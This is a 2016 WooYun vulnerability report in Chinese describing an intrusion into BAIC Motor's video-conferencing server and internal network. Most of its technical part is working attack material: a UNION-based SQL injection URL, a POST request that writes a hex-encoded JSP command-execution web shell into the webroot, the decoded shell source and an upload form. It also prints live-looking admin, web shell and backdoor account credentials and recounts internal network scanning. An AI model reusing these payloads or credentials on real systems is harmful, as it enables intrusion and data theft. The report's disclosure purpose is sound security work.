我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0192291

漏洞标题：我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

漏洞作者： DeadSea

提交时间：2016-04-04 22:16

修复时间：2016-05-20 10:50

公开时间：2016-05-20 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-04：细节已通知厂商并且等待厂商处理中
2016-04-05：厂商已经确认，细节仅向厂商公开
2016-04-15：细节向核心白帽子及相关领域专家公开
2016-04-25：细节向普通白帽子公开
2016-05-05：细节向实习白帽子公开
2016-05-20：细节向公众公开

简要描述：

mark

详细说明：

测试目标

http://video.baicmotor.com

发现是V2视频会议系统
于是乎在乌云搜索了下。发现有人提交过一个sql注入外加getshell

http://******/bugs/wooyun-2010-0143276

注入出了root权限账户

http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23

然后放到sqlmap跑下后面加个leve 2 才能跑的出来，感谢zone的小伙伴出的主意

root权限。
在跑下管理员帐号

admin/baic12345678

成功进入后

让我们研究研究getshell

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: video.baicmotor.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=utf-8
Content-Length: 1171
Cookie: JSESSIONID=804BDEBF691850876C7B73972FE2024B; Hm_lvt_74a2fe33808be9e788342930391b2bf4=1459677986; JSESSIONID=FE67B91450FF759C19F39F7C8FBBA097
Connection: keep-alive
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23

这段代码的意思就是把cmd.jsp写入root目录因为都是默认的
我想上传一句话，这个我弄了半天。最后才知道他是利用了16位进制加密

3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E

解密后是

<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"\r\n"; } } catch(IOException e) { e.printStackTrace(); } } 
out.println(output);%>

然后我就屁颠屁颠的跑去找了个jsp的一句话
发现各种加密后上传不上去全是500
然后想到了，可以利用html写个poc

<form action="http://video.baicmotor.com/7.jsp?f=1.jsp" method="post"> <textarea name=c cols=120 rows=10 width=45>your code</textarea><BR><center><br> <input type=submit 
value="提交"> </form>

直接写入，

http://video.baicmotor.com/s.jsp

密码023
然后就是提权了

幸福来的太突然了，sy权限，我呵呵了。你以为就这么简单吗？

内网呀，大兄弟。我连内网是什么都不懂，所以问了几个朋友。跟我说了一些之后就操刀上马
先转发端口到自己的服务器上

在开启扫描器各种扫内网IP 10.10.1.1~10.10.1.255
内部OA

内部管理系统

防泄漏系统

还有122个内部系统就不一一贴出来了

服务器帐号sea$ 密码sea 管理员记得删除

漏洞证明：

修复方案：

打补丁

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-04-05 10:44

厂商回复：

感谢你的努力。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0192291

漏洞标题：我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

相关厂商：北京汽车股份有限公司

漏洞作者： DeadSea

提交时间：2016-04-04 22:16

修复时间：2016-05-20 10:50

公开时间：2016-05-20 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0192291

漏洞标题：我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

相关厂商：北京汽车股份有限公司

漏洞作者： DeadSea

提交时间：2016-04-04 22:16

修复时间：2016-05-20 10:50

公开时间：2016-05-20 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0192291"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：